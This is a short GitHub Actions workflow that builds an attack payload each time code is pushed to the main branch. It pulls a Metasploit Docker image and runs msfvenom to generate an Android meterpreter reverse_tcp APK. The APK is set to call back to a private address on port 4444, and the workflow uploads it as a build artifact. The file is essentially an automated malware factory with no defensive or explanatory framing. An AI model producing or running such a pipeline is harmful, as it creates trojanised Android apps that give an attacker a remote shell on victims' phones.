name: Metasploit Workflow

on:
  push:
    branches:
      - main

jobs:
  metasploit:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Set up Docker
        uses: docker/setup-buildx-action@v2

      - name: Pull Metasploit Docker Image
        run: docker pull phocean/msf

      - name: Run Metasploit Command
        run: |
          docker run --rm \
            -v $GITHUB_WORKSPACE/tmp:/tmp \
            phocean/msf \
            bash -c "./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.194.166  LPORT=4444 -f raw -o /tmp/payload.apk"
        
      - name: Upload Payload
        uses: actions/upload-artifact@v3
        with:
          name: payload
          path: tmp/payload.apk
